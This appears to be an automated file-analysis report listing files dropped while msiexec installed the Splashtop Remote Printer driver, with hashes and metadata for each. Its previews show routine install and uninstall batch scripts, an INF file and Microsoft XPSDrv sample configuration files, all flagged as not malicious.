                                                                                                                                                                                                                                                                                                                                  SHA-256:B76D74AEC705A3F9FD055307A966777ADB279FB06D03524C992E608FE73AEB22
                                                                                                                                                                                                                                                                                                                                  SHA-512:C62DAAC3AC516500D819718BF5697D948B6EB684276A21A80E6E9C26FE5F1D0593D7FE281702D3BC48D2A1897B0EB7BD910CEE0978950C0F6636FB86E72B6BD3
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:echo off..cd %~dp0....\utils\PrnPort.exe /a >> inst.log..rundll32 printui.dll,PrintUIEntry /q /dl /n "Splashtop Remote Printer"..rundll32 printui.dll,PrintUIEntry /if /b "Splashtop Remote Printer" /f stprinter.inf /r "StPrinter" /m "Splashtop Remote Printer"..rundll32 printui.dll,PrintUIEntry /q /dl /n "Splashtop Remote Printer"....for /f "tokens=*" %%a in ( 'DIR "%WINDIR%\System32\DriverStore\FileRepository\stprint*" /B /ON /AD' ) do (.. reg add "HKLM\SOFTWARE\Splashtop Inc.\Splashtop Remote Server" /f /v "PrinterINFa" /t REG_SZ /d "%WINDIR%\System32\DriverStore\FileRepository\%%a\stprinter.inf" >> inst.log.. IF NOT EXIST "%ProgramData%\Splashtop" mkdir "%ProgramData%\Splashtop".. IF NOT EXIST "%ProgramData%\Splashtop\Temp" mkdir "%ProgramData%\Splashtop\Temp".. ECHO Found "%WINDIR%\System32\DriverStore\FileRepository\%%a\stprinter.inf" >> inst.log..)..
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):882
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.192332970304343
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:12:kcrGqwAcK/EyAZRVowyyAcK/E2kam0LYDfyegidym0EZkBqq6JFpYpFSqq6JFrm7:BrWWFwD7WR8fCI/xOZE
                                                                                                                                                                                                                                                                                                                                  MD5:16BBC22B18C5325649C98DD02F3DDDBF
                                                                                                                                                                                                                                                                                                                                  SHA1:B6F97171D20CBC84DEDB07C304F92B25B5A08450
                                                                                                                                                                                                                                                                                                                                  SHA-256:8C3BED319076C7B27FB5D9CD7DCE31E8EE09624E191BC3D709962426FB12951A
                                                                                                                                                                                                                                                                                                                                  SHA-512:293E8BF93A22021FD80AA95A30965287BF40F5030DA457BC16D004E86C3B3FF8983DA8C0D743A42F1CBF935A2EB8E1CB5FCB488914B51330686B2C60BD1C71B9
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:echo off..cd %~dp0....\utils\PrnPort.exe /a >> inst.log..rundll32 printui.dll,PrintUIEntry /q /dl /n "Splashtop Remote Printer"..rundll32 printui.dll,PrintUIEntry /if /b "Splashtop Remote Printer" /f stprinter.inf /r "StPrinter" /m "Splashtop Remote Printer"..rundll32 printui.dll,PrintUIEntry /q /dl /n "Splashtop Remote Printer"....for /f "tokens=*" %%a in ( 'DIR "%WINDIR%\System32\DriverStore\FileRepository\stprint*" /B /ON /AD' ) do (.. reg add "HKLM\SOFTWARE\Wow6432Node\Splashtop Inc.\Splashtop Remote Server" /f /v "PrinterINFa" /t REG_SZ /d "%WINDIR%\System32\DriverStore\FileRepository\%%a\stprinter.inf" >> inst.log.. IF NOT EXIST "%ProgramData%\Splashtop" mkdir "%ProgramData%\Splashtop".. IF NOT EXIST "%ProgramData%\Splashtop\Temp" mkdir "%ProgramData%\Splashtop\Temp".. ECHO Found "%WINDIR%\System32\DriverStore\FileRepository\%%a\stprinter.inf" >> inst.log..)..
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):214
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.631936044721133
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:6:Hjsm6y9jcK/ES2d6y9jcKZS2bVXzLYwkrnRS2n:DWAcK/EyAcKZRVowyh
                                                                                                                                                                                                                                                                                                                                  MD5:88E59700F53DE95D2847B9687764BE30
                                                                                                                                                                                                                                                                                                                                  SHA1:CD5780DBF1C711B9C28DC001F4149BA3251BECF7
                                                                                                                                                                                                                                                                                                                                  SHA-256:B085F4E0D6A7A4DC967C96D7C318CB749BC497135FD9E35D7AD0C88E6C53F577
                                                                                                                                                                                                                                                                                                                                  SHA-512:6E7D2FD4CF87B63BAB39E225362ECBE60F52FAB0DA42C97834B8EA59D653CDBD06B98E2C490C5465B1999AF2F7869F729CBFC34E55D5ECC768D85D48B9874374
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:cd %~dp0..rundll32 printui.dll,PrintUIEntry /q /dl /n "Splashtop Remote Printer"..rundll32 printui.dll,PrintUIEntry /q /if /b "Splashtop Remote Printer" /f stprinter.inf /r "StPrinter" /m "Splashtop Remote Printer"
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):203
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.068283784998216
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:3:mKDDQFGCTWYdym6F9K2MLgZ+X0KcK/F+N7oaf/DEd7/JQF9K2MLgZ+X0KcK/FvK2:hsICTJ6y9jcK/ePD0Sy9jcK/ES2uz
                                                                                                                                                                                                                                                                                                                                  MD5:FA3C191799254E542687F1F5D0974BC5
                                                                                                                                                                                                                                                                                                                                  SHA1:DC85AAC2AA31CD3DE9017E7E099581457AD4FBF2
                                                                                                                                                                                                                                                                                                                                  SHA-256:347B12E6E2FC79E2A3668625341D7642D531159FFE5B01AB2BC5469E0EFC6B3F
                                                                                                                                                                                                                                                                                                                                  SHA-512:635689814E63084910541BA68FE8ADE8FDFBC3D0100AFD61DDD13D07E61F3478BA75E4D24AA7B26DF21A3E46C4ED2B1C8789520C5634CAC63CFE32DCB1E8686E
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:@echo off....IF [%1] == [] GOTO RunDefault....rundll32 printui.dll,PrintUIEntry /q /dl /n %1..GOTO :EOF....:RunDefault...rundll32 printui.dll,PrintUIEntry /q /dl /n "Splashtop Remote Printer"...GOTO :EOF
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):19851
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.774813122930257
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:192:UelM68cpgw3otOCxH50u4RkeelMpSfpd/CJHJ2elMSJfApwtNJKGT1hvJNMvIqvQ:EWtO5smIwg9Zh3q8pUclGNbc
                                                                                                                                                                                                                                                                                                                                  MD5:1D56A3F8D7F5DAB184A8CC4FEDDAA173
                                                                                                                                                                                                                                                                                                                                  SHA1:75D291CB96FDC05D54C962F1CB08796EE439B22F
                                                                                                                                                                                                                                                                                                                                  SHA-256:84E1A32B4975E92477CF6A36D8931921DA735EF988E0C09A2B056F2904541B1E
                                                                                                                                                                                                                                                                                                                                  SHA-512:FB58167A98D9309A703F06D5C6414AB707B37E90A26BFC1C0812B10381C116FA6C7C26AC30FC8570B8F87186775BC64E7AF6D409A7D213FC3B4B76B0B7A76FB6
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:Windows setup INFormation
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):2793
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.507689832444162
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:48:JQUio6uDhMM/s4244P8/CW2T8/C0kApvgJCrC1sJCr+6pqEsXncT9tuhcOYEZ53t:JQUiRKhMostT9Ap4sr4ssraXx
                                                                                                                                                                                                                                                                                                                                  MD5:313535621266212971E303AF0AF4FE21
                                                                                                                                                                                                                                                                                                                                  SHA1:D81F9D3F7B638DE5EFCA0ECB0162A76485E2C2BF
                                                                                                                                                                                                                                                                                                                                  SHA-256:0B60A283CB98034CEE13118BF1F885A644479CC6F4B19D9E4D24A5FEC6064A1F
                                                                                                                                                                                                                                                                                                                                  SHA-512:8A1A716A2CAD85410F009EE0CDF570F4CA36E3A182927CA5B836F3FC0BEE466F0C4E8B583694A6A4014CE60C45A2439119BF0C1ADDA0ED168053E9F08A6DF608
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:[Version]..Signature="$Windows NT$"..Provider=%splashtop%..ClassGUID={4D36E979-E325-11CE-BFC1-08002BE10318}..Class=Printer..DriverVer=04/19/2019,10.0.10012.16386..CatalogFile=stprinter.cat....[Manufacturer]..%splashtop%=Vendor,NTx86,NTamd64,NTx86.6.0,NTamd64.6.0....[Vendor.NTx86]..%splashtop.DeviceDesc% = INSTALL_XDSMPL_FILTERS_PRE_VISTA....[Vendor.NTamd64]..%splashtop.DeviceDesc% = INSTALL_XDSMPL_FILTERS_PRE_VISTA....[Vendor.NTx86.6.0]..%splashtop.DeviceDesc% = INSTALL_XDSMPL_FILTERS_VISTA....[Vendor.NTamd64.6.0]..%splashtop.DeviceDesc% = INSTALL_XDSMPL_FILTERS_VISTA....[INSTALL_XDSMPL_FILTERS_PRE_VISTA]..CopyFiles=XPSDrvSample,ConfigPlugin,COLORPROFILES..DriverFile=mxdwdrv.dll..PrintProcessor="MS_XPS,filterpipelineprintproc.dll"..ConfigFile=UniDrvUI.dll..HelpFile=UniDrv.HLP..DataFile=XDSmpl.GPD..Include=NTPRINT.INF, MSXPSDRV.INF..Needs=UNIDRV.OEM, XPSGPD.OEM, XPSDRV.OEM....[INSTALL_XDSMPL_FILTERS_VISTA]..CopyFiles=XPSDrvSample,ConfigPlugin,COLORPROFILES..DriverFile=mxdwdrv.dll..Confi
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):2561
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.431790187193416
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:24:2uMRFNu4TMlWoDqFNQ29ZNlV2MK712DJNzaMR1X2kKJzgSZwlQXV2MK71euV2MKo:QFQ4SDC66ZLq7UAq7zq7E
                                                                                                                                                                                                                                                                                                                                  MD5:AD8561D2E73AFD63F5A088972D435467
                                                                                                                                                                                                                                                                                                                                  SHA1:FA7F53A308C00B0C5E1ACE95489658840EAF13A3
                                                                                                                                                                                                                                                                                                                                  SHA-256:68C4AF8BB6C4FB75CFA95739DF4E3B288DBBFB141E6851275E2F9EFFCA893015
                                                                                                                                                                                                                                                                                                                                  SHA-512:AA240EFD0EFD508CE48D444997E65DE8A36DE321764196C294F1366A77C3D30AEA6BF31AF53C7644BD3D027284B266D06D0B574E69598D50D44005718F3F2178
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:echo off..cd %~dp0..ECHO -- uninstall start >> inst.log....for /f "tokens=*" %%a in ( 'DIR "%WINDIR%\System32\DriverStore\FileRepository\stprint*" /B /ON /AD' ) do (.. ECHO Found Backup [%%a] >> inst.log.. SET STPRINTERREGBAK=%STPRINTERREGBAK% %%a..)....rundll32 printui.dll,PrintUIEntry /q /dl /n "Splashtop Remote Printer"....\utils\DIFxCmd.exe /u stprinter.inf >> inst.log....\utils\PrnPort.exe /d >> inst.log....for /f "tokens=*" %%a in ( 'DIR "%WINDIR%\System32\DriverStore\FileRepository\stprint*" /B /ON /AD' ) do (.. ECHO Found [%%a] >> inst.log.. ::Remove cab.. del /F /Q "%WINDIR%\System32\spool\drivers\w32x86\PCC\%%a.cab" >> inst.log.. ::Remove inf.. del /S /F /Q "%WINDIR%\System32\DriverStore\FileRepository\%%a" >> inst.log.. ::Remove reg.. reg delete "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Print\PackageInstallation\Windows NT x86\DriverPackages\%%a" /f >> inst.log..)....::Remove all files..del /F /Q "%WINDIR%\System32\spool\drivers\w32x86\3\xdbook.dll"..del /F
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):2519
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.407961236238507
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:24:2uMRFNu4TMlWSDqFNQ4ZNlV2MK71AynXV2MK71euV2MK7153w3uV:QFQ4SJC64ZLq7xq7zq7Z
                                                                                                                                                                                                                                                                                                                                  MD5:5FD0095B7389DBEDA4EC394C06AC4657
                                                                                                                                                                                                                                                                                                                                  SHA1:7C5D1C3E2B062F6E993AB34292749B03FD7007A8
                                                                                                                                                                                                                                                                                                                                  SHA-256:692FE4C899554BBFA0A05A0183F46C23A24E48FB4371DC0863B7A24452FE5252
                                                                                                                                                                                                                                                                                                                                  SHA-512:F38926653AF960FE11AD843E7C89BB9DC62C29225D2DF10B0CA9BA4F668637BE053778EE726F42A2DC76FA801593A08A69DE4CDEFCB9BE037CA094D34773A8D6
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:echo off..cd %~dp0..ECHO -- uninstall start >> inst.log....for /f "tokens=*" %%a in ( 'DIR "%WINDIR%\System32\DriverStore\FileRepository\stprint*" /B /ON /AD' ) do (.. ECHO Found Backup [%%a] >> inst.log.. SET STPRINTERREGBAK=%STPRINTERREGBAK% %%a..)....rundll32 printui.dll,PrintUIEntry /q /dl /n "Splashtop Remote Printer"....\utils\DIFxCmd64.exe /u stprinter.inf >> inst.log....\utils\PrnPort.exe /d >> inst.log....for /f "tokens=*" %%a in ( 'DIR "%WINDIR%\System32\DriverStore\FileRepository\stprint*" /B /ON /AD' ) do (.. ECHO Found [%%a] >> inst.log.. ::Remove cab.. del /F /Q "%WINDIR%\System32\spool\drivers\x64\PCC\%%a.cab" >> inst.log.. ::Remove inf.. del /S /F /Q "%WINDIR%\System32\DriverStore\FileRepository\%%a" >> inst.log.. ::Remove reg.. reg delete "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Print\PackageInstallation\Windows x64\DriverPackages\%%a" /f >> inst.log..)....::Remove all files..del /F /Q "%WINDIR%\System32\spool\drivers\x64\3\xdbook.dll"..del /F /Q "%W
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:Microsoft color profile 2.2, type lino, CMYK/Lab-prtr device by MSFT, 849080 bytes, 10-5-2006 15:02:14 "Created by Microsoft WCS from DMP: CMYKPrinter.cdmp, CAMP: Default sRGB monitor, and GMMP: Default Gamut Map Model Profile f"
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):849080
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.924819797081704
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:12288:nupHTMj2vkdYa+kYfwx+rbgal21W0M5SU1yr2U5fOFQw8LHxrLiYJVarTH46xL1F:upgavkz+UIUBRm020G7
                                                                                                                                                                                                                                                                                                                                  MD5:8EE08E7B69A5F2ECA6BB3A5EEDB48649
                                                                                                                                                                                                                                                                                                                                  SHA1:FF7CFA21BDCB220EC0450E76A1C2AB0854CAEBD6
                                                                                                                                                                                                                                                                                                                                  SHA-256:2B215C1FA5CAA10582BDAFE6B51A911C9D8B2B0B456EEEFF955064FDC3844D98
                                                                                                                                                                                                                                                                                                                                  SHA-512:12AEA33F800D5203811DE1FFA1181BD1B8A58C54BD52A9D2BF7A4084CC2BBC52C9E74E9434C41C6B1EB2CA451E81D5E11B3CE6B827BA4B0F14927EB4FAD62FF0
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):1808
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.525972600570173
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:48:FCDZkHSs9/9QltHlRIORmRCjR73RpRvrmRCgORmRCjR73RpRS:sDuH87FRDRmRCjRrRpRvrmRCbRmRCjRI
                                                                                                                                                                                                                                                                                                                                  MD5:9303837EFF41196B0FC3D6AD46FE43AF
                                                                                                                                                                                                                                                                                                                                  SHA1:9AFBCA730F3A98C5C43AC1AF156BCD6C3CE366E5
                                                                                                                                                                                                                                                                                                                                  SHA-256:ABD2E8A90B9949D61DF21DF88AED7040542555A0228BB0B375439F8488A06294
                                                                                                                                                                                                                                                                                                                                  SHA-512:9F8C9956CEB14B7A275B346A48A1C010DEB23D94BAB4E0FFD395D23B5573533EB80630092CA6A458D33762E55C260752CA294B5E0632179ECC18F17A0B961D55
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:*%..*% Copyright (c) 2005 Microsoft Corporation..*%..*% All rights reserved...*%..*% THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF..*% ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED TO..*% THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A..*% PARTICULAR PURPOSE...*%..*% File Name:..*%..*% xdbook.gpd..*%..*% Abstract:..*%..*% XPSDrv filter feature sample driver Booklet specific GPD settings...*%....*%******************************************************************************..*% JobBindAllDocuments..*%******************************************************************************..*Feature: JobBindAllDocuments..{.. *rcNameID: =IDS_GPD_JOBBINDING.. *DefaultOption: None.... *Option: None.. {.. *rcNameID: =IDS_GPD_NONE.. }.... *Option: BindLeft.. {.. *rcNameID: =IDS_GPD_LTOR.. }.... *Option: BindRight.. {.. *rcNameID: =IDS_GPD_RTOL.. }.... *Option:
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):2718
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.658165462032682
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:48:FCDZkHSs9/9xmSx8iZR/+eRxSRURJPRo/8nRFGR7RrXh8TpR9KbzkR5BMLkRWkc4:sDuHN/DRFRkRURJPRo/ARYR7Rrx+R98+
                                                                                                                                                                                                                                                                                                                                  MD5:3F80884F3D1F3B9D5D3C7279131ECB4D
                                                                                                                                                                                                                                                                                                                                  SHA1:17AB016E8AFA453B5A7DA19A6F2AB6AE0B3D78F4
                                                                                                                                                                                                                                                                                                                                  SHA-256:4D09EE22E6A9BFB33E13F5391830FFDA13A572DC6DA1E22D1DEE3D4CAD7BBBD9
                                                                                                                                                                                                                                                                                                                                  SHA-512:363579BDE28329209801FFA7EE0A3A5DD4278886453221768D2F3D7A1ECFE348884004FA08F9B6006E35A6098B72F1738B7B425C9AC8F5F2ACBDC5FD26EEA50A
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:*%..*% Copyright (c) 2005 Microsoft Corporation..*%..*% All rights reserved...*%..*% THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF..*% ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED TO..*% THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A..*% PARTICULAR PURPOSE...*%..*% File Name:..*%..*% xdcolman.gpd..*%..*% Abstract:..*%..*% XPSDrv filter feature sample driver Color Management specific GPD settings...*%....*%******************************************************************************..*% PageColorManagement..*%******************************************************************************..*Feature: PageColorManagement..{.. *rcNameID: =IDS_GPD_PAGECOLMAN.. *DefaultOption: None.. *PrintSchemaKeywordMap: "PageColorManagement".... *Option: None.. {.. *rcNameID: =IDS_GPD_NONE.. *PrintSchemaKeywordMap: "None".. }.... *Option: Device.. {.. *rcNameID: =IDS_GPD_D
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):6871
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.6709110049190015
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:*%..*% Copyright (c) 2005 Microsoft Corporation..*%..*% All rights reserved...*%..*% THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF..*% ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED TO..*% THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A..*% PARTICULAR PURPOSE...*%..*% File Name:..*%..*% xdnames.gpd..*%..*% Abstract:..*%..*% XPSDrv filter feature sample driver GPD resource names...*%....*CodePage: 1252 *% Windows 3.1 US (ANSI) code page....*Feature: RESDLL..{.. *Name: "resource dll files".. *ConcealFromUI?: TRUE.... *Option: UniresDLL.. {.. *Name: "unires.dll".. }.. *Option: xdsmplui.. {.. *Name: "xdsmplui.dll".. }..}....*Macros: StdFeatureNames..{.. IDS_GPD_1PPS: RESDLL.xdsmplui.2000.. IDS_GPD_2PPS: RESDLL.xdsmplui.2001.. IDS_GPD_4PPS: RESDLL.xdsmplui.2002.. IDS_GPD_6PPS: RESDLL.xdsmplui.2003.. IDS_GPD_8PPS:
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):4068
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.508459493570281
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:*%..*% Copyright (c) 2005 Microsoft Corporation..*%..*% All rights reserved...*%..*% THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF..*% ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED TO..*% THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A..*% PARTICULAR PURPOSE...*%..*% File Name:..*%..*% xdnup.gpd..*%..*% Abstract:..*%..*% XPSDrv filter feature sample driver NUp specific GPD settings...*%....*%******************************************************************************..*% JobNUpAllDocumentsContiguously..*%******************************************************************************..*Feature: JobNUpAllDocumentsContiguously..{.. *rcNameID: =IDS_GPD_JOBNUP.. *DefaultOption: 1.. *PrintSchemaKeywordMap: "JobNUpAllDocumentsContiguously".... *Option: 1.. {.. *rcNameID: =IDS_GPD_1PPS.. }.... *Option: 2.. {.. *rcNameID: =IDS_GPD_2PPS.. }.... *Option: 4.. {..
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):2522
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.708364933060842
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:*%..*% Copyright (c) 2005 Microsoft Corporation..*%..*% All rights reserved...*%..*% THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF..*% ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED TO..*% THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A..*% PARTICULAR PURPOSE...*%..*% File Name:..*%..*% xdpgscl.gpd..*%..*% Abstract:..*%..*% XPSDrv filter feature sample driver page scaling specific GPD settings...*%....*%******************************************************************************..*% PageScaling..*%******************************************************************************..*Feature: PageScaling..{.. *rcNameID: =IDS_GPD_PAGESCALING.. *DefaultOption: None.... *Option: None.. {.. *rcNameID: =IDS_GPD_NONE.. }.... *Option: Custom.. {.. *rcNameID: =IDS_GPD_CUSTOM.. }.... *Option: CustomSquare.. {.. *rcNameID: =IDS_GPD_CUSTSQUARE.. }.... *Option:
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:exported SGML document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):2476
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.158189280019379
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview: ....Copyright (c) 2005 Microsoft Corporation....All rights reserved.....THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF..ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED TO..THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A..PARTICULAR PURPOSE.....File Name:.... xdsmpl-pipelineconfig.xml....Abstract:.... XPSDrv sample driver filter configuration file. This identifies the.. filters that comprise the filter pipeline and their order.....-->....<Filters>.. <Filter dll = "XDWMark.dll".. clsid = "{B8B525BF-F147-460a-B2D5-9DFB1F30D0FD}".. name = "Watermark filter">.. <Input guid = "{b8cf8530-5562-47c4-ab67-b1f69ecf961e}" comment="IID_IXpsDocumentProvider"/>.. <Output guid = "{4368d8a2-4181-4a9f-b295-3d9a38bb9ba0}" comment="IID_IXpsDocumentConsumer"/>.. </Filter>.. <Filter dll = "XDScale.dll".. clsid = "{976EDCE4-274E-482a-97
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):11986
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.7262628705263445
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
